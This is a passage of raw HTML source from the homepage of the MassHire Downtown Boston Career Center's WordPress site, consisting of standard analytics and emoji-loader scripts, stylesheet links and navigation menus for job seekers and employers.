content="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_125px.png"/> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-126620910-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-126620910-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/masshiredowntownboston.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='tribe-tooltip-css' href='https://masshiredowntownboston.org/wp-content/plugins/event-tickets/common/src/resources/css/tooltip.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='rtec_styles-css' href='https://masshiredowntownboston.org/wp-content/plugins/registrations-for-the-events-calendar-pro/css/rtec-styles.css?ver=2.9.4' type='text/css' media='all' /> <link rel='stylesheet' id='bg-shce-genericons-css' href='https://masshiredowntownboston.org/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='bg-show-hide-css' href='https://masshiredowntownboston.org/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avada-parent-stylesheet-css' href='https://masshiredowntownboston.org/wp-content/themes/Avada/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avada-stylesheet-css' href='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/css/style.min.css?ver=5.8.1' type='text/css' media='all' /> <!--[if IE]> <link rel='stylesheet' id='avada-IE-css' href='https://masshiredowntownboston.org/wp-content/themes/Avada/assets/css/ie.min.css?ver=5.8.1' type='text/css' media='all' /> <style id='avada-IE-inline-css' type='text/css'> .avada-select-parent .select-arrow{background-color:#ffffff} .select-arrow{background-color:#ffffff} </style> <![endif]--> <link rel='stylesheet' id='fusion-dynamic-css-css' href='https://masshiredowntownboston.org/wp-content/uploads/fusion-styles/a649c822b06b20a66019b817bfee9f57.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='teccc_stylesheet-css' href='https://masshiredowntownboston.org/wp-content/uploads/teccc_268935e6de966d026e4299728e5d00a7.min.css?ver=6.1.1' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/masshiredowntownboston.org","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://masshiredowntownboston.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://masshiredowntownboston.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://masshiredowntownboston.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://masshiredowntownboston.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://masshiredowntownboston.org/' /> <link rel="alternate" type="application/json+oembed" href="https://masshiredowntownboston.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmasshiredowntownboston.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://masshiredowntownboston.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmasshiredowntownboston.org%2F&#038;format=xml" /> <meta name="et-api-version" content="v1"><meta name="et-api-origin" content="https://masshiredowntownboston.org"><link rel="https://theeventscalendar.com/" href="https://masshiredowntownboston.org/wp-json/tribe/tickets/v1/" /><meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://masshiredowntownboston.org"><link rel="https://theeventscalendar.com/" href="https://masshiredowntownboston.org/wp-json/tribe/events/v1/" /> <style type="text/css"> #tribe-events-content .tribe-events-calendar thead th { background-color: #003a5c; } .tribe-events-calendar thead th { color: #ffffff; } #tribe-events-content .tribe-events-calendar div[id*="tribe-events-daynum-"] { text-align: center; } .tribe-events-calendar div[id*="tribe-events-event-"] h3.tribe-events-month-event-title a, .tribe-events-calendar td .tribe-events-viewmore a { color: #000000; } #tribe-events-content table.tribe-events-calendar .type-tribe_events.tribe-event-featured .tribe-events-month-event-title a { color: #000000; } </style> <style type="text/css" id="fusion-branding-style">#wpadminbar .avada-menu>.ab-item .ab-icon:before {background: url( /sandbox/masshiretemplate/wp-content/uploads/masshire_logo_icon.png ) no-repeat center !important;background-size: auto !important;content: ""; width: 21px; height: 21px; display: inline-block; background-size: contain !important;}</style><style type="text/css">@media only screen and (max-width: 1280px){ .careerCenterTop h1 { font-size: 40px; } .careerCenterTop h4 { font-size: 23px; } .careerCenterTop h2 { font-size: 27px !important; } .careerCenterTop h3 { font-size: 26px; } .careerCenterTop .fusion-button { padding: 8px 0; } }</style><link rel="icon" href="https://masshiredowntownboston.org/wp-content/uploads/cropped-mass_site_icon-32x32.jpg" sizes="32x32" /> <link rel="icon" href="https://masshiredowntownboston.org/wp-content/uploads/cropped-mass_site_icon-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://masshiredowntownboston.org/wp-content/uploads/cropped-mass_site_icon-180x180.jpg" /> <meta name="msapplication-TileImage" content="https://masshiredowntownboston.org/wp-content/uploads/cropped-mass_site_icon-270x270.jpg" /> <style type="text/css" id="wp-custom-css"> /* Hide Weekends the Events Calendar Monday First Day of Week */ .tribe-events-calendar th#tribe-events-sunday, .tribe-events-calendar th#tribe-events-saturday, .tribe-events-calendar tr td:first-child, .tribe-events-calendar tr td:last-child { display: none; } /*center everything in 3rd footer column*/ footer .fusion-columns-3 .fusion-column-last {text-align:center;} /*hide export button on calendar month view*/ #tribe-events-content.tribe-events-month .tribe-events-button.tribe-events-ical {display:none} /*hide hover "tooltip" on calendar events*/ .tribe-events-tooltip {display: none !important;} #tribe-events-content .tribe-events-calendar .tribe-events-month-event-title a:hover { color: #003a5c; opacity:1; } .fusion-footer .fusion-button.button-2:active .fusion-button-text{ color:#fff; } div[id^="tribe-events-daynum"] a { color: #fff !important; } </style> <script type="text/javascript"> var doc = document.documentElement; doc.setAttribute('data-useragent', navigator.userAgent); </script> <meta name="google-site-verification" content="" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-89020263-1', 'auto'); ga('send', 'pageview'); </script><script> jQuery(document).ready(function($){ jQuery('body').on('hidden.bs.modal', '.modal', function () { jQuery('video').trigger('pause'); }); $('a.abutton').click(function() { $('.alabamaDiv').hide(); var id = $(this).attr('href'); console.log(id); $(id).fadeIn(3000, function () { // Animation complete }); return false; }); }); </script></head> <body class="home page-template page-template-100-width page-template-100-width-php page page-id-13440 do-etfw tribe-no-js fusion-image-hovers fusion-body ltr fusion-sticky-header no-tablet-sticky-header no-mobile-sticky-header fusion-disable-outline mobile-logo-pos-left layout-wide-mode fusion-top-header menu-text-align-left mobile-menu-design-modern fusion-show-pagination-text fusion-header-layout-v3 avada-responsive avada-footer-fx-none fusion-search-form-clean fusion-avatar-square"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <div id="wrapper" class=""> <div id="home" style="position:relative;top:-1px;"></div> <header class="fusion-header-wrapper"> <div class="fusion-header-v3 fusion-logo-left fusion-sticky-menu- fusion-sticky-logo- fusion-mobile-logo- fusion-mobile-menu-design-modern"> <div class="fusion-secondary-header"> <div class="fusion-row"> <div class="fusion-alignleft"> <div class="fusion-contact-info"><a href="https://masshiredowntownboston.org/event/whole-foods-information-interview-event/" style="color:white"/>Join us for the Whole Foods Info & Interview Event on May 22nd, 2019</a> </div> </div> <div class="fusion-alignright"> <div class="fusion-social-links-header"><div class="fusion-social-networks"><div class="fusion-social-networks-wrapper"><a class="custom fusion-social-network-icon fusion-tooltip fusion-custom fusion-icon-custom" style="color:#ffffff;position:relative;" href="https://visitor.r20.constantcontact.com/manage/optin?v=001iSHr32lsdppEsm1y11e4BwEAlFF3DvgOuJh4wgDiwJyjOwOK27EBP7HwE6Fncvt8zewMxYilHMTJAzTjciz8wZzU9wD8l8C4430o-3VM3OnDYZxm4E4OvyeaiZUuUxCB8ubCOm5UjcCLKEOzbmDo0c0Egse0KSPgeuqV8ch3QbE%3D" target="_blank" rel="noopener noreferrer" title><span class="screen-reader-text"></span><img src="https://masshiredowntownboston.org/wp-content/uploads/mail_icon_mh_2.png" style="width:auto;max-height:16px;" alt="" /></a><a class="fusion-social-network-icon fusion-tooltip fusion-facebook fusion-icon-facebook" style="color:#ffffff;" href="https://www.facebook.com/MHDowntownBos/" target="_blank" rel="noopener noreferrer" title="Facebook"><span class="screen-reader-text">Facebook</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-twitter fusion-icon-twitter" style="color:#ffffff;" href="https://twitter.com/MHDowntownBos" target="_blank" rel="noopener noreferrer" title="Twitter"><span class="screen-reader-text">Twitter</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin fusion-icon-linkedin" style="color:#ffffff;" href="https://www.linkedin.com/company/masshiredowntownboston/" target="_blank" rel="noopener noreferrer" title="Linkedin"><span class="screen-reader-text">Linkedin</span></a></div></div></div> </div> </div> </div> <div class="fusion-header-sticky-height"></div> <div class="fusion-header"> <div class="fusion-row"> <div class="fusion-logo" data-margin-top="10px" data-margin-bottom="10px" data-margin-left="0px" data-margin-right="0px"> <a class="fusion-logo-link" href="https://masshiredowntownboston.org/" > <!-- standard logo --> <img src="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_125px.png" srcset="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_125px.png 1x, https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_250px.png 2x" width="125" height="100" style="max-height:100px;height:auto;" alt="MassHire Downtown Boston Career Center Logo" data-retina_logo_url="https://masshiredowntownboston.org/wp-content/uploads/CareerCenter_DowntownBoston_250px.png" class="fusion-standard-logo" /> </a> </div> <nav class="fusion-main-menu" aria-label="Main Menu"><ul id="menu-main-menu" class="fusion-menu"><li id="menu-item-14081" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-14081 fusion-dropdown-menu" data-item-id="14081"><a href="https://masshiredowntownboston.org/aboutus/" class="fusion-bar-highlight"><span class="menu-text">About Us</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li id="menu-item-22512" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22512 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/aboutus/" class="fusion-bar-highlight"><span>About</span></a></li><li id="menu-item-22511" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22511 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/aboutus/meet-our-team/" class="fusion-bar-highlight"><span>Meet Our Team</span></a></li><li id="menu-item-23095" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23095 fusion-dropdown-submenu" ><a href="https://www.jvs-boston.org/careers-at-jvs/" class="fusion-bar-highlight"><span>Join Our Team</span></a></li></ul></li><li id="menu-item-18219" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18219 fusion-dropdown-menu" data-item-id="18219"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Job Seekers</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li id="menu-item-18191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18191 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/" class="fusion-bar-highlight"><span>Job Seekers</span></a></li><li id="menu-item-16798" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16798 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/advance-your-career/" class="fusion-bar-highlight"><span>Member Services</span></a></li><li id="menu-item-18499" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18499 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/workshops-events/" class="fusion-bar-highlight"><span>Workshops &#038; Events</span></a></li><li id="menu-item-14961" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14961 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/training-education/" class="fusion-bar-highlight"><span>Training &#038; Education</span></a></li><li id="menu-item-16927" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16927 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/finding-your-next-job/" class="fusion-bar-highlight"><span>Finding Your Next Job</span></a></li><li id="menu-item-14958" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14958 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/navigate-unemployment/" class="fusion-bar-highlight"><span>Navigate Unemployment</span></a></li><li id="menu-item-14957" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14957 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/i-got-a-job/" class="fusion-bar-highlight"><span>I Got A Job</span></a></li></ul></li><li id="menu-item-18220" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18220 fusion-dropdown-menu" data-item-id="18220"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Employers</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li id="menu-item-18192" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18192 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/" class="fusion-bar-highlight"><span>Employers</span></a></li><li id="menu-item-14988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14988 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/recruit-candidates/" class="fusion-bar-highlight"><span>Recruit Candidates</span></a></li><li id="menu-item-16898" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16898 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/job-fairs/" class="fusion-bar-highlight"><span>Job Fairs</span></a></li><li id="menu-item-14987" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14987 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/train-your-workforce/" class="fusion-bar-highlight"><span>Train Your Workforce</span></a></li><li id="menu-item-17245" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17245 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/outplacement-services/" class="fusion-bar-highlight"><span>Outplacement Services</span></a></li><li id="menu-item-17241" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17241 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/customsolutions/" class="fusion-bar-highlight"><span>Custom Solutions</span></a></li><li id="menu-item-14986" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14986 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/testimonials/" class="fusion-bar-highlight"><span>Testimonials</span></a></li></ul></li><li id="menu-item-18221" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18221 fusion-dropdown-menu" data-item-id="18221"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Resources</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li id="menu-item-18193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18193 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/resources/" class="fusion-bar-highlight"><span>Resources</span></a></li><li id="menu-item-18994" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18994 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/finding-your-next-job/" class="fusion-bar-highlight"><span>Industry Pages</span></a></li><li id="menu-item-17654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17654 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/resources/tips-articles/" class="fusion-bar-highlight"><span>Tips &#038; Articles</span></a></li></ul></li><li id="menu-item-18950" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18950 fusion-dropdown-menu" data-item-id="18950"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Calendar</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li id="menu-item-14801" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14801 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/events-calendar/" class="fusion-bar-highlight"><span>Events Calendar</span></a></li><li id="menu-item-23886" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23886 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/wp-content/uploads/1.-MH-Calendar-May-2019-V4.pdf" class="fusion-bar-highlight"><span>May Calendar (PDF)</span></a></li><li id="menu-item-24881" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24881 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/wp-content/uploads/MH-Calendar-June-2019.pdf" class="fusion-bar-highlight"><span>June Calendar (PDF)</span></a></li></ul></li><li id="menu-item-14082" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14082" data-item-id="14082"><a href="https://masshiredowntownboston.org/contact/" class="fusion-bar-highlight"><span class="menu-text">Contact</span></a></li><li class="fusion-custom-menu-item fusion-main-menu-search"><a class="fusion-main-menu-icon fusion-bar-highlight" href="#" aria-label="Search" data-title="Search" title="Search"></a><div class="fusion-custom-menu-item-contents"><form role="search" class="searchform fusion-search-form" method="get" action="https://masshiredowntownboston.org/"> <div class="fusion-search-form-content"> <div class="fusion-search-field search-field"> <label><span class="screen-reader-text">Search for:</span> <input type="text" value="" name="s" class="s" placeholder="Search ..." required aria-required="true" aria-label="Search ..."/> </label> </div> <div class="fusion-search-button search-button"> <input type="submit" class="fusion-search-submit searchsubmit" value="&#xf002;" /> </div> </div> </form> </div></li></ul></nav><div class="fusion-mobile-navigation"><ul id="menu-main-menu-1" class="fusion-mobile-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-14081 fusion-dropdown-menu" data-item-id="14081"><a href="https://masshiredowntownboston.org/aboutus/" class="fusion-bar-highlight"><span class="menu-text">About Us</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22512 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/aboutus/" class="fusion-bar-highlight"><span>About</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22511 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/aboutus/meet-our-team/" class="fusion-bar-highlight"><span>Meet Our Team</span></a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23095 fusion-dropdown-submenu" ><a href="https://www.jvs-boston.org/careers-at-jvs/" class="fusion-bar-highlight"><span>Join Our Team</span></a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18219 fusion-dropdown-menu" data-item-id="18219"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Job Seekers</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18191 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/" class="fusion-bar-highlight"><span>Job Seekers</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16798 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/advance-your-career/" class="fusion-bar-highlight"><span>Member Services</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18499 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/workshops-events/" class="fusion-bar-highlight"><span>Workshops &#038; Events</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14961 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/training-education/" class="fusion-bar-highlight"><span>Training &#038; Education</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16927 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/finding-your-next-job/" class="fusion-bar-highlight"><span>Finding Your Next Job</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14958 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/navigate-unemployment/" class="fusion-bar-highlight"><span>Navigate Unemployment</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14957 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/i-got-a-job/" class="fusion-bar-highlight"><span>I Got A Job</span></a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18220 fusion-dropdown-menu" data-item-id="18220"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Employers</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18192 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/" class="fusion-bar-highlight"><span>Employers</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14988 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/recruit-candidates/" class="fusion-bar-highlight"><span>Recruit Candidates</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16898 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/job-fairs/" class="fusion-bar-highlight"><span>Job Fairs</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14987 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/train-your-workforce/" class="fusion-bar-highlight"><span>Train Your Workforce</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17245 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/outplacement-services/" class="fusion-bar-highlight"><span>Outplacement Services</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17241 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/employers/customsolutions/" class="fusion-bar-highlight"><span>Custom Solutions</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14986 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/testimonials/" class="fusion-bar-highlight"><span>Testimonials</span></a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18221 fusion-dropdown-menu" data-item-id="18221"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Resources</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18193 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/resources/" class="fusion-bar-highlight"><span>Resources</span></a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18994 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/jobseekers/finding-your-next-job/" class="fusion-bar-highlight"><span>Industry Pages</span></a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17654 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/resources/tips-articles/" class="fusion-bar-highlight"><span>Tips &#038; Articles</span></a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18950 fusion-dropdown-menu" data-item-id="18950"><a href="#" class="fusion-bar-highlight"><span class="menu-text">Calendar</span> <span class="fusion-caret"><i class="fusion-dropdown-indicator"></i></span></a><ul role="menu" class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14801 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/events-calendar/" class="fusion-bar-highlight"><span>Events Calendar</span></a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23886 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/wp-content/uploads/1.-MH-Calendar-May-2019-V4.pdf" class="fusion-bar-highlight"><span>May Calendar (PDF)</span></a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24881 fusion-dropdown-submenu" ><a href="https://masshiredowntownboston.org/wp-content/uploads/MH-Calendar-June-2019.pdf" class="fusion-bar-highlight"><span>June Calendar (PDF)</span></a></li></ul></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14082" data-item-id="14082"><a href="https://masshiredowntownboston.org/contact/" class="fusion-bar-highlight"><span class="menu-text">Contact</span></a></li></ul></div> <div class="fusion-mobile-menu-icons"> <a href="#" class="fusion-icon fusion-icon-bars" aria-label="Toggle mobile menu" aria-expanded="false"></a> </div> <nav class="fusion-mobile-nav-holder fusion-mobile-menu-text-align-left" aria-label="Main Menu Mobile"></nav> </div> </div> </div> <div class="fusion-clearfix"></div> </header> <div id="sliders-container"> </div> <main id="main" class="clearfix width-100" style="padding-left:30px;padding-right:30px"> <div class="fusion-row" style="max-width:100%;"> <section id="content" class="full-width"> <div id="post-13440" class="post-13440 page type-page status-publish hentry"> <span class="entry-title 